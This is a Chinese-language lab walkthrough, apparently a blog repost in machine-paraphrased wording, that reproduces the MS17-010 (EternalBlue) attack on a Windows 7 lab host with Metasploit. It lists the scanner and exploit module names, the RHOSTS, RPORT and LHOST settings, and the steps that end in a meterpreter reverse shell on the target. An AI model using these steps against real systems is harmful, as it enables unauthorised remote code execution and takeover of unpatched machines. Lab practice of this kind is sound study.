环境预备
方针:192.168.164.129(win7)
缝隙:MS17-010(永久之蓝)
目的:拿到最高权限,进行远程代码执行
一、确定方针及缝隙
1、msfconsole进入MSF形式,再测验能不能ping通方针主机(192.168.164.129),用nmap扫描主机开放445端口,接下用msf测验一下缝隙是否存在。
![[永恒之蓝]实战-漏洞复现 [永恒之蓝]实战-漏洞复现](https://www.6hu.cc/wp-content/uploads/2022/12/1671218131-f45e82f564c13e4.png)
![[永恒之蓝]实战-漏洞复现 [永恒之蓝]实战-漏洞复现](https://www.6hu.cc/wp-content/uploads/2022/12/1671218134-676579bec96cc00.png)
二、查找验证模块并且调用
1、运用#search MS17-010指令,搜索查找MS17-010缝隙模块,如图:
![[永恒之蓝]实战-漏洞复现 [永恒之蓝]实战-漏洞复现](https://www.6hu.cc/wp-content/uploads/2022/12/1671218138-ceee3b4dd8b6ab0.png)
2、这儿咱们先挑选#1的auxiliary(辅佐模块)先进行踩点,检查缝隙是否能够运用,再去进行浸透进犯。
#use auxiliary/scanner/smb/smb_ms17_010
![[永恒之蓝]实战-漏洞复现 [永恒之蓝]实战-漏洞复现](https://www.6hu.cc/wp-content/uploads/2022/12/1671218141-e23ebfbb9dc1e4f.png)
3、运用#show options 指令,检查需求设置的选项(Required为yes是有必要设置的选项)。
![[永恒之蓝]实战-漏洞复现 [永恒之蓝]实战-漏洞复现](https://www.6hu.cc/wp-content/uploads/2022/12/1671218145-89826b0a9c1d56e.png)
4、设置方针地址,设置方针端口;
set RHOSTS 192.168.164.129
set RPORT 445
![[永恒之蓝]实战-漏洞复现 [永恒之蓝]实战-漏洞复现](https://www.6hu.cc/wp-content/uploads/2022/12/1671218148-870c17113a24b80.png)
5、最终运用#run或许exploit指令去运转检查缝隙是否存在
![[永恒之蓝]实战-漏洞复现 [永恒之蓝]实战-漏洞复现](https://www.6hu.cc/wp-content/uploads/2022/12/1671218152-f118beef4a1738e.png)
6、Host is likely VULNERABLE to MS17-010! 这个主机存在MS17-010缝隙,能够去运用。 检测到该方针操作系统是Windows 7 专业版 接下来咱们能够运用exploits模块进行浸透进犯。
有+号就能够进犯,能够进行IP规模扫描
三、运用exploist模块进行浸透
1、第二过程的时分检测到方针存在该缝隙,现在咱们开始进行浸透。 先运用#back指令退出辅佐模块,如图:
![[永恒之蓝]实战-漏洞复现 [永恒之蓝]实战-漏洞复现](https://www.6hu.cc/wp-content/uploads/2022/12/1671218155-98437e877588856.png)
2、运用#search MS17-010指令,搜索MS17-010模块,如图:
![[永恒之蓝]实战-漏洞复现 [永恒之蓝]实战-漏洞复现](https://www.6hu.cc/wp-content/uploads/2022/12/1671218159-5875edeb9bc0435.png)
3、咱们在第二步的时分运用的是auxiliary模块进行的缝隙检测,这回咱们运用exploit模块进行缝隙运用。这儿咱们挑选#2
use exploit/windows/smb/ms17_010_eternalblue
![[永恒之蓝]实战-漏洞复现 [永恒之蓝]实战-漏洞复现](https://www.6hu.cc/wp-content/uploads/2022/12/1671218162-a951c608e028b5e.png)
4、运用#show options指令,检查需求设置的参数,如图:
![[永恒之蓝]实战-漏洞复现 [永恒之蓝]实战-漏洞复现](https://www.6hu.cc/wp-content/uploads/2022/12/1671218166-b6f2dff8602b908.png)
5、这儿咱们看见多出一个payload选项
![[永恒之蓝]实战-漏洞复现 [永恒之蓝]实战-漏洞复现](https://www.6hu.cc/wp-content/uploads/2022/12/1671218169-1ee786358c4e2df.png)
![[永恒之蓝]实战-漏洞复现 [永恒之蓝]实战-漏洞复现](https://www.6hu.cc/wp-content/uploads/2022/12/1671218173-135be2a1c1fc870.png)
6、这个选项的用处主要是浸透进犯成功后方针机与LHOST树立的Shell衔接,所以LHOST参数设置咱们自己本地的IP地址,RHOSTS参数仍是方针IP
#set RHOSTS 192.168.164.129
#set LHOST 192.168.164.128
![[永恒之蓝]实战-漏洞复现 [永恒之蓝]实战-漏洞复现](https://www.6hu.cc/wp-content/uploads/2022/12/1671218177-9f03dfc91de53ab.png)
payloads设置
7、最终运用#run指令去运转exploit
![[永恒之蓝]实战-漏洞复现 [永恒之蓝]实战-漏洞复现](https://www.6hu.cc/wp-content/uploads/2022/12/1671218180-80e1325584b874d.png)
8、显现meterpreter,咱们现已所浸透成功了,现在咱们现已拿到方针机的Shell了。 咱们能够运用#shell指令,在方针机翻开一个shell。
![[永恒之蓝]实战-漏洞复现 [永恒之蓝]实战-漏洞复现](https://www.6hu.cc/wp-content/uploads/2022/12/1671218184-c421ff8635540e4.png)
9、输入shell,就能够进入方针靶机的shell指令界面;(出来是乱码:输入chcp 65001 这是utf8编码)
![[永恒之蓝]实战-漏洞复现 [永恒之蓝]实战-漏洞复现](https://www.6hu.cc/wp-content/uploads/2022/12/1671218188-2d0c2acc168fd01.png)
更多共享微信搜索“安全info”公众号
本文运用 文章同步帮手 同步
声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。